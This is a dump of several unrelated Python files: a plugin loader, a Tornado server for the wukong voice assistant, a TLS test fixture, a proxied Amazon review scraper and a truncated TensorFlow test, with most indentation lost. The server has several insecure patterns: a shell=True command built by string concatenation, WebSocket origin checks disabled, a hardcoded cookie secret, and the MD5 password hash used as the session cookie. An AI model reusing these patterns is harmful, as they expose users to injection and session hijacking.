def debug(self, str, *args):
print("###DEBUG# %s%s" % (self.prefix,str % args))
def fetchFromQueue(self, sequence, number=10):
time.sleep(0.5)
return sequence+2,['aha','soso']
def setPattern(self,pattern):
self.patterns=pattern
def addData(self,path,value):
if self.patterns is not None:
matches=False
for p in self.patterns:
if p.get('path') == path:
matches=True
break
if not matches:
print("@@ERROR: invalid path %s"%(path))
return
print("@@DATA@@:%s->%s"%(path,value))
import os, glob, imp
def loadModulesFromDir(dir,logger,prefix=''):
modules = {}
for path in glob.glob(os.path.join(dir, '[!_]*.py')):
name, ext = os.path.splitext(os.path.basename(path))
try:
modules[prefix+name] = imp.load_source(prefix + name, path)
logger.log("loaded %s as %s",path, prefix+name)
except:
logger.error("unable to load %s:%s",path,traceback.format_exc())
return modules
def instantiateHandlersFromModule(modulename,module,allData,logger):
rt=[] #the list of instantiated objects
MANDATORY_METHODS = ['initialize', 'run']
for name in dir(module):
obj=getattr(module,name)
ic=inspect.isclass(obj)
logger.debug("X: %s.%s => %s"%(module,name,ic))
if ic:
logger.debug("C: %s <=> %s"%(obj.__module__,module))
if obj.__module__ != (modulename):
continue
hasMethods=True
for m in MANDATORY_METHODS:
        if not hasattr(obj,m):
          hasMethods=False
          break
mObj=getattr(obj,m)
if not callable(mObj):
hasMethods=False
break
if hasMethods:
logger.log("creating %s"%(name))
api = ApiImpl()
api.prefix="(%s): "%name
startDecoder=True
handlerInstance=None
try:
handlerInstance=obj()
d=handlerInstance.initialize(api)
mData=d.get('data')
if mData is None:
raise Exception("no 'data' field in init result")
else:
for entry in mData:
path=entry.get('path')
if path is None:
raise Exception("missing path in entry %s"%(entry))
else:
if allData.get(path) is not None:
raise Exception("entry for %s already defined: %s"%(path,allData.get(path)))
allData[path]=entry
api.setPattern(mData)
except :
logger.error("##ERROR: cannot start %s:%s"%(name,traceback.format_exc()))
startDecoder=False
if startDecoder:
rt.append(handlerInstance)
return rt
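# instantiateHandlersFromModule only accepts classes defined in the loaded
# module that expose callable initialize() and run() methods, where
# initialize(api) returns a dict whose 'data' list declares the paths the
# handler will later publish through api.addData(). A minimal handler that
# satisfies this harness's contract is sketched below; in practice it would
# live in its own file under the plugins directory, and the path name is
# purely illustrative.
class _ExampleHandlerSketch(object):
  def initialize(self, api):
    self.api = api
    return {'data': [{'path': 'gps.test.counter'}]}
  def run(self):
    count = 0
    while True:
      self.api.addData('gps.test.counter', count)
      count += 1
      time.sleep(1)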
PREFIX="avnav_decoder_sys_"
logger=ApiImpl()
modules=loadModulesFromDir(os.path.join(os.path.dirname(__file__),'..','plugins'),logger,PREFIX)
print(modules)
allHandlers=[]
for modulname in modules:
handlers=instantiateHandlersFromModule(modulname,modules[modulname],allData,logger)
allHandlers+=handlers
print("created %d handlers"%len(allHandlers))
for handler in allHandlers:
try:
dt=threading.Thread(target=handler.run)
    dt.daemon = True
dt.start()
print("###INFO: started %s"%handler)
except:
print("##ERROR: cannot start %s, errors in run %s"%(handler,traceback.format_exc()))
print("Parameter Listing:")
for p in list(allData.keys()):
print("%s:%s"%(p,allData[p]))
time.sleep(10)
|
server.py
|
import json
from tornado.websocket import WebSocketHandler
from robot import config, utils, logging, constants, Updater, weatherGet
import base64
import requests
import tornado.web
import tornado.ioloop
from tornado import gen
import tornado.httpserver
import tornado.options
import hashlib
import threading
import asyncio
import subprocess
import os
import time
import yaml
import markdown
import random
logger = logging.getLogger(__name__)
conversation, wukong = None, None
suggestions = [
'现在几点',
'你吃饭了吗',
'上海的天气',
'写一首关于大海的诗',
'来玩成语接龙',
'我有多少邮件',
'你叫什么名字',
'讲个笑话'
]
class BaseHandler(tornado.web.RequestHandler):
def isValidated(self):
return self.get_cookie("validation") == config.get('/server/validate', '')
def validate(self, validation):
return validation == config.get('/server/validate', '')
class MainHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation, wukong, suggestions
if not self.isValidated():
self.redirect("/login")
return
if conversation:
info = Updater.fetch(wukong._dev)
suggestion = random.choice(suggestions)
notices = None
if 'notices' in info:
notices = info['notices']
self.render('index.html', history=conversation.getHistory(), update_info=info, suggestion=suggestion,
notices=notices)
else:
self.render('index.html', history=[])
class MagicHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation, wukong, suggestions
self.render('magic.html')
class WeatherHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation, wukong, suggestions
        self.render('a.html', data=weatherGet.get_weather_data(), week=['(今天)', '(明天)', '(后天)', '', '', ''])  # use a list so the day labels keep their order
class ChatHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'text':
query = self.get_argument('query')
uuid = self.get_argument('uuid')
conversation.doResponse(query=query, UUID=uuid)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
elif self.get_argument('type') == 'voice':
voice_data = self.get_argument('voice')
tmpfile = utils.write_temp_file(base64.b64decode(voice_data), '.wav')
fname, suffix = os.path.splitext(tmpfile)
nfile = fname + '-16k' + suffix
# downsampling
soxCall = 'sox ' + tmpfile + \
' ' + nfile + ' rate 16k'
subprocess.call([soxCall], shell=True, close_fds=True)
utils.check_and_delete(tmpfile)
conversation.doConverse(nfile)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class GetHistoryHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
res = {'code': 0, 'message': 'ok', 'history': json.dumps(conversation.getHistory())}
self.write(json.dumps(res))
self.finish()
class GetConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
key = self.get_argument("key", default="")
res = ''
if key == '':
res = {'code': 0, 'message': 'ok', 'config': config.getText(),
'sensitivity': config.get('sensitivity', 0.5)}
else:
res = {'code': 0, 'message': 'ok', 'value': config.get(key)}
self.write(json.dumps(res))
self.finish()
class GetLogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
lines = self.get_argument('lines', default=200)
res = {'code': 0, 'message': 'ok', 'log': logging.readLog(lines)}
self.write(json.dumps(res))
self.finish()
class LogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render("log.html")
class OperateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'restart':
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
self.finish()
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class ConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render('config.html', sensitivity=config.get('sensitivity'))
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
configStr = self.get_argument('config')
try:
                yaml.safe_load(configStr)  # validate the YAML before persisting it
config.dump(configStr)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
except:
res = {'code': 1, 'message': 'YAML解析失败,请检查内容'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class DonateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
return
r = requests.get('https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/donate.md')
content = markdown.markdown(r.text, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('donate.html', content=content)
class APIHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ''
with open(os.path.join(constants.TEMPLATE_PATH, "api.md"), 'r') as f:
content = f.read()
content = markdown.markdown(content, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('api.html', content=content)
class UpdateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if wukong.update():
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': '更新失败,请手动更新'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class LoginHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.redirect('/')
else:
self.render('login.html', error=None)
@tornado.web.asynchronous
@gen.coroutine
def post(self):
if self.get_argument('username') == config.get('/server/username') and \
hashlib.md5(self.get_argument('password').encode('utf-8')).hexdigest() \
== config.get('/server/validate'):
self.set_cookie("validation", config.get('/server/validate'))
self.redirect("/")
else:
self.render('login.html', error="登录失败")
class LogoutHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.set_cookie("validation", '')
self.redirect("/login")
class SocketHandler(WebSocketHandler):
    users = set()  # container holding the users currently online
def data_received(self, chunk):
pass
def open(self):
        self.users.add(self)  # add the user to the container once the connection is established
        for u in self.users:  # send a message to every user already online
u.write_message("{\"action_info\": \"msg\",\"msg\": \"先生您好\"}")
def on_message(self, message):
        for u in self.users:  # broadcast the message to online users
u.write_message(u"")
def on_close(self):
        self.users.remove(self)  # remove the user from the container after the connection closes
for u in self.users:
u.write_message("")
def check_origin(self, origin):
        return True  # allow cross-origin WebSocket requests
'''
Manual wake-up
'''
class Start(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global wukong
# wukong.run()
'''
Called whenever there is speech output
'''
def onSay(msg):
logger.error("发送前端消息:-->" + msg)
for u in SocketHandler.users: # 向在线用户广播消息
u.write_message(msg)
settings = {
"cookie_secret": b'*\xc4bZv0\xd7\xf9\xb2\x8e\xff\xbcL\x1c\xfa\xfeh\xe1\xb8\xdb\xd1y_\x1a',
"template_path": "server/templates",
"static_path": "server/static",
"debug": False
}
application = tornado.web.Application([
(r"/", MainHandler),
(r"/login", LoginHandler),
(r"/gethistory", GetHistoryHandler),
(r"/chat", ChatHandler),
(r"/config", ConfigHandler),
(r"/getconfig", GetConfigHandler),
(r"/operate", OperateHandler),
(r"/getlog", GetLogHandler),
(r"/log", LogHandler),
(r"/logout", LogoutHandler),
(r"/api", APIHandler),
(r"/upgrade", UpdateHandler),
(r"/donate", DonateHandler),
(r"/magic", MagicHandler),
(r"/weather", WeatherHandler),
(r"/ws", SocketHandler),
(r"/start", Start)
], **settings)
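# ChatHandler accepts form-encoded POSTs carrying the 'validate' token plus
# either a text query or base64-encoded wav audio. A minimal client-side
# sketch of the text case (host, port and token values are placeholders):
def _chat_text_example(query, uuid, validate, host='127.0.0.1', port=5000):
    resp = requests.post('http://%s:%d/chat' % (host, port),
                         data={'validate': validate, 'type': 'text',
                               'query': query, 'uuid': uuid})
    return json.loads(resp.text)   # {'code': 0, 'message': 'ok'} on success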
def start_server(con, wk):
global conversation, wukong
conversation = con
wukong = wk
if config.get('/server/enable', False):
port = config.get('/server/port', '5000')
try:
asyncio.set_event_loop(asyncio.new_event_loop())
application.listen(int(port))
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
            logger.critical('Failed to start the server: {}'.format(e))
def run(conversation, wukong):
t = threading.Thread(target=lambda: start_server(conversation, wukong))
t.start()
|
conftest.py
|
# -*- coding: utf-8 -*-
try:
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
except ImportError:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
import ssl
import tempfile
import threading
import pytest
from hackurllib.compat import urljoin
import trustme
def prepare_url(value):
# Issue #1483: Make sure the URL always has a trailing slash
httpbin_url = value.url.rstrip('/') + '/'
def inner(*suffix):
return urljoin(httpbin_url, '/'.join(suffix))
return inner
@pytest.fixture
def httpbin(httpbin):
return prepare_url(httpbin)
@pytest.fixture
def httpbin_secure(httpbin_secure):
return prepare_url(httpbin_secure)
@pytest.fixture
def nosan_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only commonName, no subjectAltName
server_cert = ca.issue_cert(common_name=u"localhost")
ca_bundle = str(tmpdir / "ca.pem")
ca.cert_pem.write_to_path(ca_bundle)
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
server_cert.configure_cert(context)
server = HTTPServer(("localhost", 0), SimpleHTTPRequestHandler)
server.socket = context.wrap_socket(server.socket, server_side=True)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
yield "localhost", server.server_address[1], ca_bundle
server.shutdown()
server_thread.join()
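# nosan_server yields (host, port, ca_bundle) for a TLS server whose
# certificate carries only a commonName and no subjectAltName; tests use it to
# check how the client under test treats CN-only certificates. A consuming
# test would unpack it roughly like this (no assertion is shown because the
# expected outcome depends on the client policy being tested):
#
#   def test_cn_only_certificate(nosan_server):
#       host, port, ca_bundle = nosan_server
#       url = "https://{0}:{1}/".format(host, port)
#       ...  # issue a request against `url`, trusting `ca_bundle`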
|
goods_review_thread.py
|
import pandas as pd
import requests
from lxml import etree
import re, time, random, datetime
from queue import Queue
import threading
class Review:
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 \
(KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36"
}
proxies = {
"http": "http://117.91.131.74:9999",
}
def __init__(self, domain):
self.view_list = []
self.page_list = []
self.url_queue = Queue()
if domain.strip().lower() == 'jp':
self.row_url = "https://www.amazon.co.jp"
        elif domain.strip().lower() == 'com':
self.row_url = "https://www.amazon.com"
self.s = requests.Session()
self.s.get(url=self.row_url, headers=self.headers, proxies=self.proxies)
def get_review(self, url):
res = self.s.get(url, headers=self.headers, proxies=self.proxies)
if res.status_code != 200:
print("请求出错,状态码为:%s" % res.status_code)
print(res.text)
return
res_html = etree.HTML(res.text)
        # product name shown in the review page header
view_goods = res_html.xpath('//span[@class="a-list-item"]/a/text()')[0]
        # container elements, one per review
view_con = res_html.xpath('//div[@class="a-section review aok-relative"]')
for each_view in view_con:
            # reviewer name
view_name = each_view.xpath('.//span[@class="a-profile-name"]/text()')[0]
view_star_raw = each_view.xpath('.//div[@class="a-row"]/a[@class="a-link-normal"]/@title')[0]
            # star rating
view_star = view_star_raw.split(' ')[0]
            # review title
view_title = each_view.xpath('.//a[@data-hook="review-title"]/span/text()')[0]
            # review date
view_date = each_view.xpath('.//span[@data-hook="review-date"]/text()')[0]
view_format = each_view.xpath('.//a[@data-hook="format-strip"]/text()')
view_colour = None
view_size = None
try:
for each in view_format:
if re.search("color|colour|色", each, re.I):
view_colour = each.split(':')[1].strip()
if re.search("size|style|サイズ", each, re.I):
view_size = each.split(":")[1].strip()
except:
pass
            # review body
view_body = each_view.xpath('string(.//span[@data-hook="review-body"]/span)')
            # helpful vote count
try:
view_useful_raw = each_view.xpath('.//span[@data-hook="helpful-vote-statement"]/text()')[0]
view_useful = view_useful_raw.split(' ')[0]
if view_useful == 'one':
view_useful = 1
try:
view_useful = int(view_useful)
except:
pass
except:
view_useful = 0
            # assembled review record for this product
each_view_list = [view_goods, view_name, view_star, view_title, view_date, view_colour, view_size,
view_body, view_useful]
self.view_list.append(each_view_list)
# print(self.view_list[-1])
def run(self, data):
goods_data = pd.read_excel(data, encoding='utf-8')
base_url = self.row_url + "/product-reviews/"
# goods_data.drop_duplicates(subset=['r','评价数量'],inplace=True)
for each_asin, each_count in zip(goods_data['ASIN'][5:50], goods_data['goods_review_count'][5:50]):
if each_asin and int(each_count) > 0:
if int(each_count) % 10 == 0:
end_page = int(each_count) // 10 + 1
else:
end_page = int(each_count) // 10 + 2
for page in range(1, end_page):
if page == 1:
url = base_url + each_asin
else:
url = base_url + each_asin + '?pageNumber=' + str(page)
self.url_queue.put(url)
print("review_page_%d" % page, url)
time.sleep(1.5)
while True:
try:
review_threads = [threading.Thread(target=self.get_review, args=(self.url_queue.get(),))
for m in range(30) if not self.url_queue.empty()]
for each in review_threads:
each.start()
print("队列剩余数量", self.url_queue.qsize())
for each in review_threads:
each.join()
except:
print("请求链接出错,重试中...")
pass
time.sleep(random.uniform(0.5,2.1))
if self.url_queue.empty():
break
view_goods_pd = pd.DataFrame(self.view_list,
columns=['review_goods', 'review_name', 'review_star', 'review_title',
'review_date', 'review_colour', 'review_size', 'review_body',
'review_useful'])
view_goods_pd.drop_duplicates(subset=['review_name', 'review_date','review_body'], inplace=True)
aft = datetime.datetime.now().strftime('%m%d%H%M')
file_name = r'../data/goods_review/' + "reviews_" + aft + ".xlsx"
view_goods_pd.to_excel(file_name, encoding='utf-8', engine='xlsxwriter')
print("共获取评论数量:", len(self.view_list))
if __name__ == '__main__':
data = r"../data/category/Kid's Weighted Blankets_08_28_13_22.xlsx"
review = Review(domain='com')
review.run(data=data)
|
monitored_session_test.py
|
# pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitored_session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
import glob
import os
import threading
import time
import tensorflow as tf
from tensorflow.contrib import testing
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.training import monitored_session
class ScaffoldTest(tf.test.TestCase):
"""Scaffold tests."""
def test_nothing_created_before_finalize(self):
with tf.Graph().as_default():
scaffold = tf.train.Scaffold()
self.assertEqual(None, scaffold.init_op)
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertEqual(None, scaffold.ready_op)
self.assertEqual(None, scaffold.local_init_op)
self.assertEqual(None, scaffold.saver)
def test_defaults_empty_graph(self):
with tf.Graph().as_default():
scaffold = tf.train.Scaffold()
tf.Variable(1, name='my_var')
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, tf.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, tf.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, tf.Operation))
self.assertTrue(isinstance(scaffold.saver, tf.train.Saver))
with self.test_session() as sess:
self.assertTrue(b'my_var' in sess.run(scaffold.ready_op))
sess.run([scaffold.init_op, scaffold.local_init_op])
self.assertEquals(0, len(sess.run(scaffold.ready_op)))
def test_defaults_no_variables(self):
with tf.Graph().as_default():
scaffold = tf.train.Scaffold()
tf.constant(1, name='my_const')
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, tf.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, tf.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, tf.Operation))
self.assertTrue(isinstance(scaffold.saver, tf.train.Saver))
def test_caches_values(self):
with tf.Graph().as_default():
tf.Variable([1])
scaffold1 = tf.train.Scaffold()
scaffold1.finalize()
scaffold2 = tf.train.Scaffold()
scaffold2.finalize()
self.assertEqual(scaffold1.init_op, scaffold2.init_op)
self.assertEqual(scaffold1.ready_op, scaffold2.ready_op)
self.assertEqual(scaffold1.local_init_op, scaffold2.local_init_op)
self.assertEqual(scaffold1.saver, scaffold2.saver)
def test_raise_error_if_more_than_one_cached_item(self):
with tf.Graph().as_default():
tf.Variable([1])
tf.add_to_collection(tf.GraphKeys.SAVERS, tf.train.Saver())
tf.add_to_collection(tf.GraphKeys.SAVERS, tf.train.Saver())
with self.assertRaisesRegexp(RuntimeError, 'More than one item'):
tf.train.Scaffold().finalize()
def test_uses_passed_values(self):
with tf.Graph().as_default():
tf.Variable([1])
saver = tf.train.Saver()
scaffold = tf.train.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
local_init_op=6,
saver=saver)
scaffold.finalize()
self.assertEqual(2, scaffold.init_op)
self.assertEqual(3, scaffold.init_feed_dict)
self.assertTrue(callable(scaffold.init_fn))
self.assertEqual(5, scaffold.ready_op)
self.assertEqual(6, scaffold.local_init_op)
self.assertEqual(saver, scaffold.saver)
def test_graph_is_finalized(self):
with tf.Graph().as_default():
tf.Variable([1])
tf.train.Scaffold().finalize()
with self.assertRaisesRegexp(RuntimeError,
'Graph is finalized and cannot be modified'):
tf.constant([0])
def _test_dir(temp_dir, test_name):
"""Create an empty dir to use for tests.
Args:
temp_dir: Tmp directory path.
test_name: Name of the test.
Returns:
Absolute path to the test directory.
"""
test_dir = os.path.join(temp_dir, test_name)
if os.path.isdir(test_dir):
for f in glob.glob('%s/*' % test_dir):
os.remove(f)
else:
os.makedirs(test_dir)
return test_dir
class FakeHook(tf.train.SessionRunHook):
def __init__(self):
self.should_stop = False
self.request = None
self.call_counter = Counter()
self.last_run_context = None
self.last_run_values = None
def begin(self):
self.call_counter['begin'] += 1
def before_run(self, run_context):
self.call_counter['before_run'] += 1
self.last_run_context = run_context
return self.request
def after_run(self, run_context, run_values):
self.call_counter['after_run'] += 1
self.last_run_values = run_values
if self.should_stop:
run_context.request_stop()
def end(self, session):
self.call_counter['end'] += 1
class MonitoredTrainingSessionTest(tf.test.TestCase):
"""Tests MonitoredTrainingSession."""
def test_saving_restoring_checkpoint(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
with tf.train.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with tf.train.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(2, session.run(gstep))
def test_summaries(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
new_gstep = tf.assign_add(gstep, 1)
tf.summary.scalar('my_summary_tag', new_gstep * 2)
with tf.train.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
for _ in range(101): # 100 is default summary writing steps
session.run(new_gstep)
summaries = testing.latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_custom_saving(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
fake_hook = FakeHook()
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
with tf.train.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
chief_only_hooks=[fake_hook],
save_checkpoint_secs=0) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# Check whether custom hook called or not
self.assertEqual(1, fake_hook.call_counter['begin'])
# A restart will not find the checkpoint, since we didn't save.
with tf.train.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
class StopAtNSession(monitored_session._WrappedSession):
"""A wrapped session that stops at the N-th call to _check_stop."""
def __init__(self, sess, n):
super(StopAtNSession, self).__init__(sess)
self._count = n
def _check_stop(self):
if self._count == 0:
return True
self._count -= 1
return False
class WrappedSessionTest(tf.test.TestCase):
"""_WrappedSession tests."""
def test_properties(self):
with self.test_session() as sess:
tf.constant(0.0)
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEquals(sess.graph, wrapped_sess.graph)
self.assertEquals(sess.sess_str, wrapped_sess.sess_str)
def test_should_stop_on_close(self):
with self.test_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertFalse(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
def test_should_stop_uses_check_stop(self):
with self.test_session() as sess:
wrapped_sess = StopAtNSession(sess, 3)
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertTrue(wrapped_sess.should_stop())
def test_should_stop_delegates_to_wrapped_session(self):
with self.test_session() as sess:
wrapped_sess0 = StopAtNSession(sess, 4)
wrapped_sess1 = monitored_session._WrappedSession(wrapped_sess0)
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertTrue(wrapped_sess1.should_stop())
def test_close_twice(self):
with self.test_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
def test_run(self):
with self.test_session() as sess:
c = tf.constant(0)
v = tf.identity(c)
self.assertEqual(42, sess.run(v, feed_dict={c: 42}))
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEqual(51, wrapped_sess.run(v, feed_dict={c: 51}))
def busy_wait_for_coord_stop(coord):
while not coord.should_stop():
time.sleep(0.001)
class CoordinatedSessionTest(tf.test.TestCase):
"""_CoordinatedSession tests."""
def test_properties(self):
with self.test_session() as sess:
tf.constant(0.0)
coord = tf.train.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEquals(sess.graph, coord_sess.graph)
self.assertEquals(sess.sess_str, coord_sess.sess_str)
def test_run(self):
with self.test_session() as sess:
c = tf.constant(0)
v = tf.identity(c)
coord = tf.train.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEqual(42, coord_sess.run(v, feed_dict={c: 42}))
def test_should_stop_on_close(self):
with self.test_session() as sess:
coord = tf.train.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord_sess.close()
self.assertTrue(coord_sess.should_stop())
def test_should_stop_on_coord_stop(self):
with self.test_session() as sess:
coord = tf.train.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord.request_stop()
self.assertTrue(coord_sess.should_stop())
def test_dont_request_stop_on_exception_in_main_thread(self):
with self.test_session() as sess:
c = tf.constant(0)
v = tf.identity(c)
coord = tf.train.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
self.assertEqual(0, coord_sess.run(c))
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
self.assertFalse(coord.should_stop())
self.assertFalse(coord_sess.should_stop())
def test_stop_threads_on_close_after_exception(self):
with self.test_session() as sess:
c = tf.constant(0)
v = tf.identity(c)
coord = tf.train.Coordinator()
threads = [threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(0, coord_sess.run(c))
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
for t in threads:
self.assertTrue(t.is_alive())
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
def test_stop_threads_on_close(self):
with self.test_session() as sess:
coord = tf.train.Coordinator()
threads = [threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
class AbortAtNSession(object):
"""A mock sessionthat aborts at the N-th run call."""
def __init__(self, sess, n):
self._sess = sess
self._count = n
def close(self):
pass
def run(self, *args, **kwargs):
if self._count == 0:
raise tf.errors.AbortedError('Aborted at N', None, None)
self._count -= 1
return self._sess.run(*args, **kwargs)
class RecoverableSessionTest(tf.test.TestCase):
"""_RecoverableSession tests."""
class _SessionReturner(object):
def __init__(self, sess):
self._sess = sess
def create_session(self):
return self._sess
def test_properties(self):
with self.test_session() as sess:
tf.constant(0.0)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEquals(sess.graph, recoverable_sess.graph)
self.assertEquals(sess.sess_str, recoverable_sess.sess_str)
def test_run(self):
with self.test_session() as sess:
c = tf.constant(0)
v = tf.identity(c)
